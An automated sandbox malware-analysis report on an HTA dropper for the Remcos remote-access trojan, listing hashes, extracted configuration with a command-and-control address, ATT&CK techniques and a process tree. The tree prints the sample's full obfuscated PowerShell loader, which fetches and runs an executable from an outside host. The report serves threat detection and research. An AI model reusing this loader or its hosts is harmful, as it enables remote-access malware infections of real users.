remcos | 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

General

Target

crreatedbestthingswithgreatattitudeneedforthat.hta
Size

142KB
MD5

22ca9f87ffb6d9d3dc9d7e4f151470c7
SHA1

df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
SHA256

6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
SHA512

e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
SSDEEP

768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Score

10^/10

remcos elvis defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-GJDISH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2804	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2804	powershell.exe
1904	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2116	nicetomeetyousweeet.exe

Loads dropped DLL 4 IoCs

pid	Process
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2804	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1416 wrote to memory of 1904	1416	mshta.exe	31
PID 1416 wrote to memory of 1904	1416	mshta.exe	31
PID 1416 wrote to memory of 1904	1416	mshta.exe	31
PID 1416 wrote to memory of 1904	1416	mshta.exe	31
PID 1904 wrote to memory of 2804	1904	cmd.exe	33
PID 1904 wrote to memory of 2804	1904	cmd.exe	33
PID 1904 wrote to memory of 2804	1904	cmd.exe	33
PID 1904 wrote to memory of 2804	1904	cmd.exe	33
PID 2804 wrote to memory of 2884	2804	powershell.exe	34
PID 2804 wrote to memory of 2884	2804	powershell.exe	34
PID 2804 wrote to memory of 2884	2804	powershell.exe	34
PID 2804 wrote to memory of 2884	2804	powershell.exe	34
PID 2884 wrote to memory of 2952	2884	csc.exe	35
PID 2884 wrote to memory of 2952	2884	csc.exe	35
PID 2884 wrote to memory of 2952	2884	csc.exe	35
PID 2884 wrote to memory of 2952	2884	csc.exe	35
PID 2804 wrote to memory of 2116	2804	powershell.exe	37
PID 2804 wrote to memory of 2116	2804	powershell.exe	37
PID 2804 wrote to memory of 2116	2804	powershell.exe	37
PID 2804 wrote to memory of 2116	2804	powershell.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1416
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5ota6vy.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD55A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD559.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
  - - C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
      "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
      4⤵
      Executes dropped EXE
      PID:2116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD55A.tmp

Filesize
1KB

MD5
8d6bada47c32bba61c5c371cc0f5649f

SHA1
b260b6f31503ae633d140ceda3b3a55d0b9232a5

SHA256
9b722bb72bef8f56ddc8a6258396307117556f376ae540216b4271d9de432840

SHA512
27a083534f7a68bd0be949a5a1c60324ec859796b89f2cc6c310810e72b1e34ea0f13cdf19d515fc30b9895ec17eceb0c05101581cbd9b8d59df9d34ecb33389

Download Submit
C:\Users\Admin\AppData\Local\Temp\x5ota6vy.dll

Filesize
3KB

MD5
44591b8fda2cf7877f759800275e6009

SHA1
43fd5206672d79ede014e869bde5345eb940a6cf

SHA256
e3029d448e9fbb62daab858eeea00cb7535e21bc3ec47945052fa7a188857ec1

SHA512
7933db4163f4e0614ede1f508d5b5e8de2b9ee5eed812f19fecd18a2164b2515954759ec892092bd64efdb2b8a0d9617333a79d643292b2880f6e0d816a3db95

Download Submit
C:\Users\Admin\AppData\Local\Temp\x5ota6vy.pdb

Filesize
7KB

MD5
070a4d34987e8713f0c63342a84611d8

SHA1
6cba2065a55ae07663b3156c6c490b1eb8be6b1f

SHA256
14314a65485912e241228c3b3b51fb3cd8cf7c3adbd4feb511fc6ccc2571c127

SHA512
35e72f226afa7c8c8b3cdde85f699ef5e90882fe0263906c49805197aceb03ac0adc1253a4ae1baffcb0daced3732575298f402a710bb581738a0fc1a244e7d5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD559.tmp

Filesize
652B

MD5
b902b09fdea123d05318404578c9f481

SHA1
33234ffc73b69ef9c78fadfecd84b56f96058cc6

SHA256
27134769011df654a8921a58144af4126f9b9b32909a3bd41baffe96c17a5989

SHA512
7cbb46532e80f259f0aa7873f46d363c1c6c5ae4114d3a0eac7928b1a80bbfaa877cf8439d80ffd96aed6186db2eac6e7b9d9b5aedadb0e075a838e6d6046b37

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x5ota6vy.0.cs

Filesize
478B

MD5
80c03b4485808d996cc8226157f377a7

SHA1
7cc7e02b84232b1523c555a349c86fc059a98eff

SHA256
240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

SHA512
ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x5ota6vy.cmdline

Filesize
309B

MD5
60cacee4fc3d9fd0a629b96fc8e4f353

SHA1
b3acc35bcfe0b9aa819a7a2b345edec84e2e18c2

SHA256
b7ab20c4dd51661d8443d37858e3627fc57a742fbb8ddaa73c6a71c540601628

SHA512
987d9b05649310561c5977555224d1d6ae00d3b113ea6354fa47838d4aff6d8c9a31d392a93ae4d398cfd7ec3977a302531ca067b5925575bd728721c5a925c7

Download Submit
\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

Filesize
528KB

MD5
a2d03c5333bfecca62720cd6ee3a4dc4

SHA1
ce4c380f2748f375904c17b38d4f93e294fef4f6

SHA256
ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

SHA512
5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

Download Submit
memory/2116-44-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-48-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-43-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-41-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-45-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-46-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-47-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-42-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-49-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-50-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-51-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-52-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-53-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2116-54-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download

Analysis

Sharing